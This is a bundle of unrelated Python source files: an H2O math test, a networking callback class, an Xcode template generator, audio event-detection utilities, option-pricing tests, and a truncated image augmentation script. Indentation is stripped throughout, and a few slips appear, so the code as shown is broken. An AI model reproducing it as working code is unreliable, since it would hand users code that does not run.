h2o_signif = h2o_data5[c].signif(digits=d)
h2o_round = h2o_data5[c].round(digits=d+4)
s = h2o_signif[0]
r = h2o_round[0]
assert s == r, "Expected these to be equal, but signif: {0}, round: {1}".format(s, r)
h2o_transposed = h2o_data1[c].transpose()
x, y = h2o_transposed.dim
assert x == 1 and y == 10, "Expected 1 row and 10 columns, but got {0} rows and {1} columns".format(x,y)
h2o.np_comparison_check(h2o_data1[:,c].cos(), np.cos(np_data1[:,c]), 10)
h2o.np_comparison_check(h2o_data1[:,c].sin(), np.sin(np_data1[:,c]), 10)
h2o.np_comparison_check(h2o_data1[:,c].tan(), np.tan(np_data1[:,c]), 10)
h2o.np_comparison_check(h2o_data2[:,c].acos(), np.arccos(np_data2[:,c]), 10)
h2o.np_comparison_check(h2o_data2[:,c].asin(), np.arcsin(np_data2[:,c]), 10)
h2o.np_comparison_check(h2o_data1[:,c].atan(), np.arctan(np_data1[:,c]), 10)
h2o.np_comparison_check(h2o_data1[:,c].cosh(), np.cosh(np_data1[:,c]), 10)
h2o.np_comparison_check(h2o_data1[c].sinh(), np.sinh(np_data1[:,c]), 10)
h2o.np_comparison_check(h2o_data1[c].tanh(), np.tanh(np_data1[:,c]), 10)
h2o.np_comparison_check(h2o_data3[c].acosh(), np.arccosh(np_data3[:,c]), 10)
h2o.np_comparison_check(h2o_data1[c].asinh(), np.arcsinh(np_data1[:,c]), 10)
h2o_val = h2o_data3[c].gamma()[5,:]
num_val = math.gamma(h2o_data3[5,c])
assert abs(h2o_val - num_val) < max(abs(h2o_val), abs(num_val)) * 1e-6, \
"check unsuccessful! h2o computed {0} and math computed {1}. expected equal gamma values between h2o and" \
"math".format(h2o_val,num_val)
h2o_val = h2o_data3[c].lgamma()[5,:]
num_val = math.lgamma(h2o_data3[5,c])
assert abs(h2o_val - num_val) < max(abs(h2o_val), abs(num_val)) * 1e-6, \
"check unsuccessful! h2o computed {0} and math computed {1}. expected equal lgamma values between h2o and " \
"math".format(h2o_val,num_val)
h2o_val = h2o_data3[c].digamma()[5,:]._scalar()
num_val = scipy.special.polygamma(0,h2o_data3[5,c])
assert abs(h2o_val - num_val) < max(abs(h2o_val), abs(num_val)) * 1e-6, \
"check unsuccessful! h2o computed {0} and math computed {1}. expected equal digamma values between h2o and " \
"math".format(h2o_val,num_val)
h2o_val = h2o_data3[c].trigamma()[5,:]
num_val = scipy.special.polygamma(1,h2o_data3[5,c])
assert abs(h2o_val - float(num_val)) < max(abs(h2o_val), abs(num_val)) * 1e-6, \
"check unsuccessful! h2o computed {0} and math computed {1}. expected equal trigamma values between h2o and " \
"math".format(h2o_val,num_val)
# for c in range(col):
# h2o_val = h2o_data5[c].all()
# num_val = True if np.all(np_data5[:,c]) else False
# assert h2o_val == num_val, "check unsuccessful! h2o computed {0} and numpy computed {1}. expected equal " \
# "values between h2o and numpy".format(h2o_val,num_val)
if __name__ == "__main__":
h2o.run_test(sys.argv, vec_math_ops)
|
<gh_stars>0
#!/usr/bin/env python3
'''
Copyright 2016 <NAME>
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
'''
## @file
#
# This file implements the callback interface used to inform games that they've received net
# events. The game can provide their own functions/methods to be called, but for the most
# part, inheriting nClientCallback and nServerCallback should be sufficient.
#
# The Callback class is used internally only and should not be used by games.
#
# Your callback's name should be the message or event to which it applies. For example, if you
# want to respond to Chat messages, the name of that message will be "chat", so your callback
# should be named "chat". Callbacks without names will never be called.
#
# Regardless of where your callback will be called from, it will be passed a list of keyword
# arguments. If your callback is used to process network messages, the arguments will be the
# actual members of the message. In other situations, the callback arguments will be specified
# by the documentation for the appropriate situation.
## The callback list object. This object stores a list of callbacks. It is used internally
# to store registered callbacks by the Transport object as well as the Protocol object. It
# can be used by an EventDispatcher object as well, but is not required.
#
# By default, callbacks are stored as lists for the event to which they refer. This means
# that multiple callbacks can be registered for the same event, and they will be called in
# arbitrary order, unless specified otherwise by callback options.
class CallbackList(object):
## The actual callback list
__callbacks = None
def __init__(self):
super().__init__()
self.__callbacks = {
}
## Register a callback.
#
# @param name the name of the callback. It should be a specific message or event type,
# such as "chat" or "login" or "timeout".
# @param func the function that will be called. It should take a keyword list of arguments.
# @param options the options for the callback, which depends on the callbck type.
def RegisterCallback(self, name, func, options={}):
if name not in self.__callbacks:
self.__callbacks[name] = []
self.__callbacks[name].append({
'callback' : func,
'options' : options,
} )
## Gets the list of callback objects for a specific name. These callback objects can
# then be executed immediately, if desired, or scheduled to be executed later, for example
# by a different thread. See Callback for more information.
#
# @param name the name of the callback.
def GetCallbacks(self, name):
retList = []
if name in self.__callbacks:
retList = []
for a in self.__callbacks[name]:
retList.append( Callback(name=name,
callback=a['callback'],
options=a['options'] ) )
else:
print("Couldn't find callback: " + str(name) )
return retList
## Returns the options for the specified callback. It does not return the actual callback
# itself, just the options for it. Note that only the options for the first registered
# callback are returned, and those are usually supplied by the library.
def GetCallbackOptions(self, name):
if name in self.__callbacks:
return self.__callbacks[name][0]['options']
# @todo EXCEPTIONS EVERYWHERE NEED THEM EVERYWHERE!!!!
return None
## The callback class, used when a callback has to be queued up to be called from the main thread.
class Callback(object):
## The function that will be called.
__callback = None
## The name of the callback.
__name = None
## The argument list for when the callback is executed
__args = None
## The options for the callback
__options = None
def __init__(self, **args):
if 'callback' in args:
self.__callback = args['callback']
self.__options = {}
if 'options' in args:
self.__options = args['options']
self.__name = args['name']
self.__args = {}
def name(self):
return self.__name
## When the callback is queued, call this to set the arguments that it'll need when called.
# It takes a keyword list corresponding to the network message that's being responded to,
# or the specific network event in the event that there's no network message associated.
def setargs(self, args):
self.__args = args
def setname(self, name):
self.__name = name
def setcallback(self, callback):
self.__callback = callback
## Actually calls the callback.
#
# @param args An optional dictionary containing any additional arguments intended for the
# callback. It will be added to the local __args member, if provided.
def Call(self, **args):
theArgs = self.__args
if len(args) > 0:
for key, value in args:
theArgs[key] = value
self.__callback(**theArgs)
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# ----------------------------------------------------------------------------
# Xcode 4 template generator for cocos2d project
# (c) 2011 <NAME>
#
# LICENSE: Dual License: MIT & GNU GPL v2 Whatever suits you best.
#
# Given a directory, it generates the "Definitions" and "Nodes" elements
#
# Format taken from: http://blog.boreal-kiss.net/2011/03/11/a-minimal-project-template-for-xcode-4/
# ----------------------------------------------------------------------------
'''
Xcode 4 template generator
'''
__docformat__ = 'restructuredtext'
_template_open_body = """<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<!-- FILE AUTOGENERATED BY cocos2d/tools/template_generator.py DO NOT EDIT -->
<plist version="1.0">
<dict>
<key>Description</key>
<string>This is a template description.</string>
<key>Identifier</key>
<string>com.cocos2d-v2.%s</string>
<key>Kind</key>
<string>Xcode.Xcode3.ProjectTemplateUnitKind</string>"""
_template_close_body = "</dict>\n</plist>"
_template_header_path= """<key>Targets</key>
<array>
<dict>
<key>SharedSettings</key>
<dict>
<key>HEADER_SEARCH_PATHS</key>
<string>%s</string>
</dict>
</dict>
</array>"""
_template_user_header_path= """<key>Targets</key>
<array>
<dict>
<key>SharedSettings</key>
<dict>
<key>ALWAYS_SEARCH_USER_PATHS</key>
<string>YES</string>
<key>USER_HEADER_SEARCH_PATHS</key>
<string>%s</string>
</dict>
</dict>
</array>"""
_template_ancestor = """ <key>Ancestors</key>
<array>
<string>%s</string>
</array>"""
# python
import sys
import os
import getopt
import glob
class Xcode4Template(object):
def __init__(self, directory, group=0, identifier="XXX", header_path=None, user_header_path=None, ancestor=None):
self.directory = directory
self.files_to_include = []
self.wildcard = '*'
self.ignore_extensions = ['h','txt','html','patch','cmake', 'py', 'markdown', 'md', 'graffle', 'sh', 'ini', 'bridgesupport', 'tbl', 'msg']
self.ignore_directories = ['docs', 'html']
self.group_start_index = group # eg: if 1 then libs/cocos2d/support -> ["cocos2d", "support"] ignoring "libs"
self.output = []
self.identifier = identifier
self.header_path = header_path
self.user_header_path = user_header_path
self.ancestor = ancestor
def scandirs(self, path):
for currentFile in glob.glob(os.path.join(path, self.wildcard)):
if os.path.isdir(currentFile):
self.scandirs(currentFile)
else:
self.files_to_include.append(currentFile)
#
# append the definitions
#
def append_definition(self, output_body, path, group, dont_index):
output_body.append("\t\t<key>%s</key>" % path)
output_body.append("\t\t<dict>")
if group:
output_body.append("\t\t\t<key>Group</key>")
output_body.append("\t\t\t<array>")
for g in group:
output_body.append("\t\t\t\t<string>%s</string>" % g)
output_body.append("\t\t\t</array>")
output_body.append("\t\t\t<key>Path</key>\n\t\t\t<string>%s</string>" % path)
if dont_index:
output_body.append("\t\t\t<key>TargetIndices</key>\n\t\t\t<array/>")
output_body.append("\t\t</dict>")
#
# Generate the "Definitions" section
#
def generate_definitions(self):
output_header = "\t<key>Definitions</key>"
output_dict_open = "\t<dict>"
output_dict_close = "\t</dict>"
output_body = []
for path in self.files_to_include:
# group name
group = []
# obtain group name from directory
dirs = os.path.dirname(path)
lastdir = dirs.split(os.path.sep)[-1]
if lastdir in self.ignore_directories:
sys.stderr.write('Ignoring definition: "%s" because it is in directory: "%s"\n' % (os.path.basename(path), lastdir))
continue
group = dirs.split('/')
group = group[self.group_start_index:]
# get the extension
filename = os.path.basename(path)
name_extension= filename.split('.')
extension = None
if len(name_extension) == 2:
extension = name_extension[1]
self.append_definition(output_body, path, group, extension in self.ignore_extensions)
self.output.append(output_header)
self.output.append(output_dict_open)
self.output.append("\n".join(output_body))
self.output.append(output_dict_close)
#
# Generates the "Nodes" section
#
def generate_nodes(self):
output_header = "\t<key>Nodes</key>"
output_open = "\t<array>"
output_close = "\t</array>"
output_body = []
for path in self.files_to_include:
lastdir = os.path.dirname(path).split(os.path.sep)[-1]
if lastdir in self.ignore_directories:
sys.stderr.write('Ignoring node: "%s" because it is in directory: "%s"\n' % (os.path.basename(path), lastdir))
continue
output_body.append("\t\t<string>%s</string>" % path)
self.output.append(output_header)
self.output.append(output_open)
self.output.append("\n".join(output_body))
self.output.append(output_close)
#
# Generate ancestors
#
def generate_ancestor(self):
if self.ancestor:
self.output.append(_template_ancestor % self.ancestor)
#
# Generates the include directory
#
def generate_header_path(self):
if self.header_path:
self.output.append(_template_header_path % self.header_path)
if self.user_header_path:
self.output.append(_template_user_header_path % self.user_header_path)
#
# Generates the plist. Send it to to stdout
#
def generate_xml(self):
self.output.append(_template_open_body % self.identifier)
self.generate_ancestor()
self.generate_definitions()
self.generate_nodes()
self.generate_header_path()
self.output.append(_template_close_body)
print "\n".join(self.output)
def generate(self):
self.scandirs(self.directory)
self.generate_xml()
def help():
print "%s v1.1 - An utility to generate Xcode 4 templates" % sys.argv[0]
print "Usage:"
print "-g --group\t\tdirectory_used_as_starting_group (if 1, then 'libs/cocos2d/Support/' -> ['cocos2d','Support'] ignoring 'libs')"
print "-i --identifier\t\tidentifier (Xcode4 template identifier)"
print "-a --ancestor\t\tancestor identifier. Default: none"
print "--header-path\t\theader search path"
print "--user-header-path\tuser header search path"
print "directory_to_parse"
print "\nExample:"
print "\t%s -i kazmathlib --header-path ___PACKAGENAME___/libs/kazmath/include libs" % sys.argv[0]
print "\t%s -i cocos2dlib libs" % sys.argv[0]
sys.exit(-1)
if __name__ == "__main__":
if len(sys.argv) == 1:
help()
directory = None
group = 0
identifier = None
header_path= None
user_header_path= None
ancestor = None
argv = sys.argv[1:]
try:
opts, args = getopt.getopt(argv, "a:g:i:", ["ancestor=","group=","identifier=","header-path=", "user-header-path="])
if len(args) == 0:
help()
for opt, arg in opts:
if opt in ("-g","--group"):
group = arg
if opt in ("-i","--identifier"):
identifier = arg
if opt in ["--header-path"]:
header_path= arg
if opt in ["--user-header-path"]:
user_header_path= arg
if opt in ("-a", "--ancestor"):
ancestor = arg
except getopt.GetoptError,e:
print e
directory = args[0]
if directory == None:
help()
gen = Xcode4Template(directory=directory, group=int(group), identifier=identifier, header_path=header_path, user_header_path=user_header_path, ancestor=ancestor)
gen.generate()
|
#Some codes are adopted from https://github.com/DCASE-REPO/DESED_task
import torch
import torch.nn as nn
import torchaudio
from torch.utils.data import Sampler
import os
import math
import scipy
from pathlib import Path
from utils.evaluation_measures import compute_sed_eval_metrics
from utils.dataset import *
class Encoder:
def __init__(self, labels, audio_len, frame_len, frame_hop, net_pooling=1, sr=16000):
if type(labels) in [np.ndarray, np.array]:
labels = labels.tolist()
self.labels = labels
self.audio_len = audio_len
self.frame_len = frame_len
self.frame_hop = frame_hop
self.sr = sr
self.net_pooling = net_pooling
n_samples = self.audio_len * self.sr
self.n_frames = int(math.ceil(n_samples/2/self.frame_hop)*2 / self.net_pooling)
def _time_to_frame(self, time):
sample = time * self.sr
frame = sample / self.frame_hop
return np.clip(frame / self.net_pooling, a_min=0, a_max=self.n_frames)
def _frame_to_time(self, frame):
time = frame * self.net_pooling * self.frame_hop / self.sr
return np.clip(time, a_min=0, a_max=self.audio_len)
def encode_strong_df(self, events_df):
# from event dict, generate strong label tensor sized as [n_frame, n_class]
true_labels = np.zeros((self.n_frames, len(self.labels)))
for _, row in events_df.iterrows():
if not pd.isna(row['event_label']):
label_idx = self.labels.index(row["event_label"])
onset = int(self._time_to_frame(row["onset"])) #버림 -> 해당 time frame에 걸쳐있으면 true
offset = int(np.ceil(self._time_to_frame(row["offset"]))) #올림 -> 해당 time frame에 걸쳐있으면 true
true_labels[onset:offset, label_idx] = 1
return true_labels
def encode_weak(self, events):
# from event dict, generate weak label tensor sized as [n_class]
labels = np.zeros((len(self.labels)))
if len(events) == 0:
return labels
else:
for event in events:
labels[self.labels.index(event)] = 1
return labels
def decode_strong(self, outputs):
#from the network output sized [n_frame, n_class], generate the label/onset/offset lists
pred = []
for i, label_column in enumerate(outputs.T): #outputs size = [n_class, frames]
change_indices = self.find_contiguous_regions(label_column)
for row in change_indices:
onset = self._frame_to_time(row[0])
offset = self._frame_to_time(row[1])
onset = np.clip(onset, a_min=0, a_max=self.audio_len)
offset = np.clip(offset, a_min=0, a_max=self.audio_len)
pred.append([self.labels[i], onset, offset])
return pred
def decode_weak(self, outputs):
result_labels = []
for i, value in enumerate(outputs):
if value == 1:
result_labels.append(self.labels[i])
return result_labels
def find_contiguous_regions(self, array):
#find at which frame the label changes in the array
change_indices = np.logical_xor(array[1:], array[:-1]).nonzero()[0]
#shift indices to focus the frame after
change_indices += 1
if array[0]:
#if first element of array is True(1), add 0 in the beggining
#change_indices = np.append(0, change_indices)
change_indices = np.r_[0, change_indices]
if array[-1]:
#if last element is True, add the length of array
change_indices = np.r_[change_indices, array.size]
#reshape the result into two columns
return change_indices.reshape((-1, 2))
def decode_pred_batch(outputs, weak_preds, filenames, encoder, thresholds, median_filter, decode_weak, pad_idx=None):
pred_dfs = {}
for threshold in thresholds:
pred_dfs[threshold] = pd.DataFrame()
for batch_idx in range(outputs.shape[0]): #outputs size = [bs, n_class, frames]
for c_th in thresholds:
output = outputs[batch_idx] #outputs size = [n_class, frames]
if pad_idx is not None:
true_len = int(output.shape[-1] * pad_idx[batch_idx].item)
output = output[:true_len]
output = output.transpose(0, 1).detach().cpu().numpy() #output size = [frames, n_class]
if decode_weak: # if decode_weak = 1 or 2
for class_idx in range(weak_preds.size(1)):
if weak_preds[batch_idx, class_idx] < c_th:
output[:, class_idx] = 0
elif decode_weak > 1: # use only weak predictions (weakSED)
output[:, class_idx] = 1
if decode_weak < 2: # weak prediction masking
output = output > c_th
output = scipy.ndimage.filters.median_filter(output, (median_filter, 1))
pred = encoder.decode_strong(output)
pred = pd.DataFrame(pred, columns=["event_label", "onset", "offset"])
pred["filename"] = Path(filenames[batch_idx]).stem + ".wav"
pred_dfs[c_th] = pred_dfs[c_th].append(pred, ignore_index=True)
return pred_dfs
class ConcatDatasetBatchSampler(Sampler):
def __init__(self, samplers, batch_sizes, epoch=0):
self.batch_sizes = batch_sizes
self.samplers = samplers #각 dataset에 대한 sampler들
self.offsets = [0] + np.cumsum([len(x) for x in self.samplers]).tolist()[:-1] #sampler 길이의 cumulative sum
self.epoch = epoch
self.set_epoch(self.epoch)
def _iter_one_dataset(self, c_batch_size, c_sampler, c_offset):
batch = []
for idx in c_sampler:
batch.append(c_offset + idx)
if len(batch) == c_batch_size:
yield batch
def set_epoch(self, epoch):
if hasattr(self.samplers[0], "epoch"):
for s in self.samplers:
s.set_epoch(epoch)
def __iter__(self):
iterators = [iter(i) for i in self.samplers]
tot_batch = []
for b_num in range(len(self)): #총 batch number만큼 for loop 돌림
for samp_idx in range(len(self.samplers)): #각 sampler의 길이만큼 for loop 돌림: [0,1,2]
c_batch = [] #current batch list생성
while len(c_batch) < self.batch_sizes[samp_idx]: #current sampler의 batchsize만큼 current_batch에 샘플 집어넣기
c_batch.append(self.offsets[samp_idx] + next(iterators[samp_idx]))
tot_batch.extend(c_batch)
yield tot_batch
tot_batch = []
def __len__(self):
min_len = float("inf")
for idx, sampler in enumerate(self.samplers):
c_len = (len(sampler)) // self.batch_sizes[idx]
min_len = min(c_len, min_len)
return min_len #synth, weak, unlabeled dataset길이를 각각의 batch_size로 나눠서 제일 작은값을 반환
class ExponentialWarmup(object):
def __init__(self, optimizer, max_lr, rampup_length, exponent=-5.0):
self.optimizer = optimizer
self.rampup_length = rampup_length
self.max_lr = max_lr
self.step_num = 1
self.exponent = exponent
def zero_grad(self):
self.optimizer.zero_grad()
def _get_lr(self):
return self.max_lr * self._get_scaling_factor()
def _set_lr(self, lr):
for param_group in self.optimizer.param_groups:
param_group["lr"] = lr
def step(self):
self.step_num += 1
lr = self._get_lr()
self._set_lr(lr)
# def load_state_dict(self, state_dict):
# self.__dict__.update(state_dict)
#
# def state_dict(self):
# return {key: value for key, value in self.__dict__.items() if key != "optimizer"}
def _get_scaling_factor(self):
if self.rampup_length == 0:
return 1.0
else:
current = np.clip(self.step_num, 0.0, self.rampup_length)
phase = 1.0 - current / self.rampup_length
return float(np.exp(self.exponent * phase * phase))
def update_ema(net, ema_net, step, ema_factor):
# update EMA model
alpha = min(1 - 1 / step, ema_factor)
for ema_params, params in zip(ema_net.parameters(), net.parameters()):
ema_params.data.mul_(alpha).add_(params.data, alpha=1 - alpha)
return ema_net
def log_sedeval_metrics(predictions, ground_truth, save_dir=None):
""" Return the set of metrics from sed_eval
Args:
predictions: pd.DataFrame, the dataframe of predictions.
ground_truth: pd.DataFrame, the dataframe of groundtruth.
save_dir: str, path to the folder where to save the event and segment based metrics outputs.
Returns:
tuple, event-based macro-F1 and micro-F1, segment-based macro-F1 and micro-F1
"""
if predictions.empty:
return 0.0, 0.0, 0.0, 0.0
gt = pd.read_csv(ground_truth, sep="\t")
event_res, segment_res = compute_sed_eval_metrics(predictions, gt)
if save_dir is not None:
os.makedirs(save_dir, exist_ok=True)
with open(os.path.join(save_dir, "event_f1.txt"), "w") as f:
f.write(str(event_res))
with open(os.path.join(save_dir, "segment_f1.txt"), "w") as f:
f.write(str(segment_res))
return (
event_res.results()["class_wise_average"]["f_measure"]["f_measure"],
event_res.results()["overall"]["f_measure"]["f_measure"],
segment_res.results()["class_wise_average"]["f_measure"]["f_measure"],
segment_res.results()["overall"]["f_measure"]["f_measure"],
) # return also segment measures
class Scaler(nn.Module):
def __init__(self, statistic="instance", normtype="minmax", dims=(0, 2), eps=1e-8):
super(Scaler, self).__init__()
self.statistic = statistic
self.normtype = normtype
self.dims = dims
self.eps = eps
def load_state_dict(self, state_dict, strict=True):
if self.statistic == "dataset":
super(Scaler, self).load_state_dict(state_dict, strict)
def _load_from_state_dict(self, state_dict, prefix, local_metadata, strict,
missing_keys, unexpected_keys, error_msgs):
if self.statistic == "dataset":
super(Scaler, self)._load_from_state_dict(state_dict, prefix, local_metadata, strict, missing_keys,
unexpected_keys, error_msgs)
def forward(self, input):
if self.statistic == "dataset":
if self.normtype == "mean":
return input - self.mean
elif self.normtype == "standard":
std = torch.sqrt(self.mean_squared - self.mean ** 2)
return (input - self.mean) / (std + self.eps)
else:
raise NotImplementedError
elif self.statistic =="instance":
if self.normtype == "mean":
return input - torch.mean(input, self.dims, keepdim=True)
elif self.normtype == "standard":
return (input - torch.mean(input, self.dims, keepdim=True)) / (
torch.std(input, self.dims, keepdim=True) + self.eps)
elif self.normtype == "minmax":
return (input - torch.amin(input, dim=self.dims, keepdim=True)) / (
torch.amax(input, dim=self.dims, keepdim=True)
- torch.amin(input, dim=self.dims, keepdim=True) + self.eps)
else:
raise NotImplementedError
else:
raise NotImplementedError
class AsymmetricalFocalLoss(nn.Module):
def __init__(self, gamma=0, zeta=0):
super(AsymmetricalFocalLoss, self).__init__()
self.gamma = gamma # balancing between classes
self.zeta = zeta # balancing between active/inactive frames
def forward(self, pred, target):
losses = - (((1 - pred) ** self.gamma) * target * torch.clamp_min(torch.log(pred), -100) +
(pred ** self.zeta) * (1 - target) * torch.clamp_min(torch.log(1 - pred), -100))
return torch.mean(losses)
def take_log(feature):
amp2db = torchaudio.transforms.AmplitudeToDB(stype="amplitude")
amp2db.amin = 1e-5
return amp2db(feature).clamp(min=-50, max=80)
def count_parameters(model):
total_params = 0
for name, parameter in model.named_parameters():
if not parameter.requires_grad:
continue
param = parameter.numel()
total_params += param
return total_params
|
<gh_stars>1-10
# Author: <NAME>
# Date: Mar 19, 2020
# Version: 0.0.2
import numpy as np
import pandas as pd
import time
import stochastic
import portfolio
def test_est():
a = np.random.randint(10, 20)
b = np.random.randint(2 * a, 3 * a)
m1 = ('equal_weights', 'exponential_weights', 'linear-weights')
m2 = ('equal_weights', 'exponential_weights', 'ledoit_wolf', 'oas')
test_set = pd.DataFrame(np.random.normal(size=(b, a)))
for x in m1:
for y in m2:
rs = portfolio.estimate(test_set, x, y)
print(rs)
def test_markowitz(n1=100, n2=1000, n3=1000):
cases = np.zeros(4, dtype=np.int)
for _ in range(n1):
# simulated data set
a = np.random.randint(10, 20)
b = np.random.randint(2 * a, 3 * a)
test_set = pd.DataFrame(np.random.normal(size=(b, a)))
rs, covs = portfolio.estimate(test_set)
'''
singleton1: no short constraints
singleton2: short constraints, (-inf, inf)
compare singleton1 with singleton2
measure the efficiency of optimization algorithm (scipy.optimize.minimize)
singleton3: short constraints, (0, 1) -> non-negative
'''
singleton1 = portfolio.Markowitz(covs, rs)
singleton2 = portfolio.Markowitz(covs, rs, bounds=((None, None),))
singleton3 = portfolio.Markowitz(covs, rs, bounds=((0, 1),))
''' Without short constraints '''
w1 = singleton1.allocate('GMV')
w2 = singleton2.allocate('GMV')
if (np.absolute(w1 - w2) > 1e-8).any():
print(np.absolute(w1 - w2).max())
cases[0] += 1
port_cov1 = w1 @ covs @ w1
for _ in range(n2):
random_weights = np.random.normal(size=a)
random_weights /= random_weights.sum()
random_cov = random_weights @ covs @ random_weights
# check if variance is minimum among other portfolios
if random_cov < port_cov1:
cases[1] += 1
''' With short constraints '''
w3 = singleton3.allocate('GMV')
port_cov3 = w3 @ covs @ w3
w4 = singleton3.allocate('MSR')
port_sharpe3 = (w4 @ rs) / (w4 @ covs @ w4)
for _ in range(n3):
random_weights = np.absolute(np.random.normal(size=a))
random_weights /= random_weights.sum()
random_cov = random_weights @ covs @ random_weights
random_sharpe = random_weights @ rs / random_cov
# check if variance is minimum among other portfolios
if random_cov < port_cov3:
cases[2] += 1
# check if sharpe is maximum among other portfolios
if random_sharpe > port_sharpe3:
cases[3] += 1
print(random_sharpe, port_sharpe3)
''' Portfolio with expected returns '''
er = np.random.uniform(0.0, 0.2)
w5 = singleton1.allocate('opt-ret', er)
w6 = singleton2.allocate('opt-ret', er)
if (np.absolute(w5 - w6) > 1e-8).any():
print(np.absolute(w5 - w6).max())
cases[0] += 1
print(f'Case 1 Error: Exceed maximum tolerance in optimization. {cases[0]} / {n1 * 2} failed.')
print(f'Case 2 Error: GMV without short constraints is incorrect. {cases[1]} / {n1 * n2} failed.')
print(f'Case 3 Error: GMV with short constraints is incorrect. {cases[2]} / {n1 * n3} failed.')
print(f'Case 4 Error: MSR with short constraints is incorrect. {cases[3]} / {n1 * n3} failed.')
def test_rp(n=100):
pass
def test_stochastic_simulate_ir(times=10000):
# ou, cir
ou = stochastic.OrnsteinUhlenbeck(0.02, 0.05, 1, 0.1, 0.2)
res1 = np.fromiter((ou.simulate() for _ in range(times)), dtype=np.float).mean()
print(res1) # 0.037
print()
cir = stochastic.CoxIntergellRoss(0.02, 0.05, 1, 0.1, 0.2)
res = np.fromiter((cir.simulate() for _ in range(times)), dtype=np.float).mean()
print(res) # 0.037
def test_stochastic_simulate_stock(model=0):
if model == 0:
cev = stochastic.CEV(292.45, 0.0236, 0.12, 84 / 252, 1.0)
elif model == 1:
cev = stochastic.CEV(120.0, 0.04, 0.3, 0.5, 1.0)
options = ['call', 'put', 'call-spread', 'put-spread', 'call-binary', 'put-binary'] #
exercises = ['vanilla'] # 'lookback-fixed', 'lookback-float' 'Asian-fixed', 'Asian-float'
styles = ['American'] # 'European'
for option in options:
for exercise in exercises:
if option[-1] == 'd':
if exercise[-1] == 't':
continue
strikes = (310.0, 315.0)
else:
strikes = (310.0,)
for style in styles:
res = cev.simulate(n=1000, pack=(option, exercise, style, *strikes, 10000, None, None))
print(option, exercise, style, res)
def test_cev_pde(case=2):
""" test the special case (BS-Model), check if pde solution converges to formula solution """
if case == 0:
t = 144 / 252
cev = stochastic.CEV(277.33, 0.0247, 0.1118, t, 1.0)
k1, k2 = 285.0, 290.0
elif case == 1:
t = 1.0
cev = stochastic.CEV(100.0, 0.1, 0.3, t, 1.0)
k1, k2 = 95.0, 105.0
elif case == 2:
t = 84 / 252
cev = stochastic.CEV(292.45, 0.0236, 0.12, 84 / 252, 1.0)
k1, k2 = 310.0, 315.0
d = {1: cev.pde(t / 1000, 0.01, ('call', 'European', k1)),
2: cev.pde(t / 1000, 0.01, ('put', 'European', k1)),
3: cev.pde(t / 1000, 0.01, ('call-spread', 'European', k1, k2)),
4: cev.pde(t / 1000, 0.01, ('put-spread', 'European', k1, k2)),
5: cev.pde(t / 1000, 0.01, ('call-binary', 'European', k1)),
6: cev.pde(t / 1000, 0.01, ('put-binary', 'European', k1)),
7: cev.pde(t / 1000, 0.01, ('call', 'American', k1)),
8: cev.pde(t / 1000, 0.01, ('put', 'American', k1)),
9: cev.pde(t / 1000, 0.01, ('call-spread', 'American', k1, k2)),
10: cev.pde(t / 1000, 0.01, ('put-spread', 'American', k1, k2)),
11: cev.pde(t / 1000, 0.01, ('call-binary', 'American', k1)),
12: cev.pde(t / 1000, 0.01, ('put-binary', 'American', k1))}
for v in d.values():
print(v)
"""
7.68560738555255 11.361290729770904 7.6786823587981825 11.911016320988761
1.8823261132827405 2.64853753885148 3.108537197878851 4.929993852051919
19.47436149386628 5.433098144275096 19.474361504654876 5.936348291067235
5.184298869815485 2.6868106922175428 8.046269671302197 4.801753497973709
"""
def test_bs_formula():
bs = stochastic.BlackScholes(277.33, 0.0247, 0.1118, 144/252)
c1 = bs.european_vanilla_option_formula(285.0, 'call', 'value')
c2 = bs.european_vanilla_option_formula(290.0, 'call', 'value')
p1 = bs.european_vanilla_option_formula(285.0, 'put', 'value')
p2 = bs.european_vanilla_option_formula(290.0, 'put', 'value')
cb1 = bs.european_vanilla_option_formula(280.0, 'call', 'value')
b1 = bs.european_barrier_option_formula(280.0, 300.0, 0.0, 'up-out-call', 'value') # 0.0070
print(c1, c1-c2, p1, p2-p1)
print(cb1, b1) # 7.6856073822393824 1.8823250330486587 11.361290726706613 3.0475992361525073
def test_heston_calibrate():
ht = stochastic.Heston(267.15, 0.015, 0.08, 0.7, 0.1, 0.2, -0.4, 0.5, 2.0, 0.0177)
df = pd.read_csv(r'data\opt-data.csv')
tm = df['expT'].values
km = df['K'].values
cm = (df['call_bid'].values + df['call_ask'].values) / 2
print(tm, km, cm)
res = ht.calibrate(tm, km, cm)
print(res) # [ 0.06110104, 0.52289908, 0.07485918, 2.68277196, -0.55149318]
def test_cev_calibrate():
t = 144 / 252
cev = stochastic.CEV(277.33, 0.0247, 0.1118, t, 1.0)
df = pd.read_csv(r'data\opt-data.csv')
# expiry, strike, call price, put price
tm = df['expT'].values
km = df['K'].values
cm = (df['call_bid'].values + df['call_ask'].values) / 2
pm = (df['put_bid'].values + df['put_ask'].values) / 2
res = cev.calibrate(tm, km, cm, pm)
print(res)
if __name__ == '__main__':
start = time.time()
# test_est()
# test_markowitz()
# test_stochastic_simulate_ir()
# test_stochastic_simulate_stock(0)
# test_cev_pde(2)
# test_bs_formula()
# test_cev_calibrate()
# a = cp.exp(1)
print('t', time.time() - start)
|
<filename>4_Data_Augmentation.py
# -*- coding: utf-8 -*-
"""
Created on Thu Nov 28 14:44:36 2019
@author: fg010
"""
import os
import cv2
import numpy as np
import imgaug as ia
from imgaug import augmenters as iaa
import glob
"""
该过程可选
需要预先复制一份train set到同一个文件夹下,取名为train_data_augmentation
"""
def Data_Augmentation(path,save_path):
all_images = glob.glob(path + '\\*.jpg')# 获取目录下所有图片路径
for path in all_images:
name = os.path.basename(path)[:-4]
try:
images = cv2.imdecode(np.fromfile(path,dtype=np.uint8),1)
except:
continue
images = [images, images, images]# 数据量变成3倍
sometimes = lambda aug: iaa.Sometimes(0.5, aug) # 定义一个lambda表达式,以p=0.5的概率去执行sometimes传递的图像增强
seq =iaa.Sequential(
[
iaa.Fliplr(0.5), # horizontal flips
iaa.Flipud(0.5),
sometimes(iaa.Crop(percent=(0, 0.1))),
